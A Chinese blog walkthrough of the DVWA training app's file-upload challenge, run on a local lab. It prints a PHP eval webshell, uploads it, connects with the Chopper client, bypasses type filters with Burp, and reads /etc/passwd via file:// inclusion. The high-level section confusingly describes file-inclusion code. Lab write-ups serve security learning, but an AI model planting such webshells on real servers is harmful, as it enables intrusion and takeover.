DVWA 之文件上傳漏洞

  • List item

Low

沒有進(jìn)行任何過濾


在這里插入圖片描述

首相,上傳一個(gè)phpinfo.php,其內(nèi)代碼如下:
<?php phpinfo(); ?>

上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后訪問

在這里插入圖片描述

首先,寫好

說(shuō)明存在上傳和執(zhí)行漏洞

上傳一句話木馬:
<?php @eval($_POST[“hack”]); ?>
保存為hack.php
然后上傳


在這里插入圖片描述

找到文件上傳目錄

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar這個(gè)插件,上傳命令,爆出信息


在這里插入圖片描述

使用菜刀連接


在這里插入圖片描述

在這里插入圖片描述

成功

Medium

有過濾


在這里插入圖片描述

使用str_replace函數(shù)是極其不安全的,因?yàn)榭梢允褂秒p寫繞過替換規(guī)則。
同時(shí),因?yàn)樘鎿Q的只是“../”、“..\”,所以對(duì)采用絕對(duì)路徑的方式包含文件是不會(huì)受到任何限制的。
可以先在上傳一個(gè)
此題要求,需要上傳 .png或 .jpeg格式文件
因此,我們想到可以更改文件類型,然后上傳
直接hack.php擴(kuò)展名改為hack.png,然后上傳,


在這里插入圖片描述

可以上傳成功,
使用菜刀連接
在這里插入圖片描述

連接不上
制作圖片碼上傳,同樣如此
那么,可以使用burp抓包修改文件類型看看


在這里插入圖片描述
在這里插入圖片描述

成功

High

其過濾內(nèi)容為


在這里插入圖片描述

這個(gè)if語(yǔ)句的意思是如果page中不含有file并且page不等于include.php服務(wù)器才不會(huì)去包含相應(yīng)的文件。兩個(gè)條件只要不滿足其中之一就可以,要么page等于include.php,要么page含有file。用file://流訪問本地文件系統(tǒng)

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd

在這里插入圖片描述

說(shuō)明存在命令執(zhí)行
上菜刀,結(jié)果發(fā)現(xiàn)無(wú)聊是如何,jar版本的死活連不上,使用windows .exe版本的可以,我也懵逼
在這里插入圖片描述

在這里插入圖片描述

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容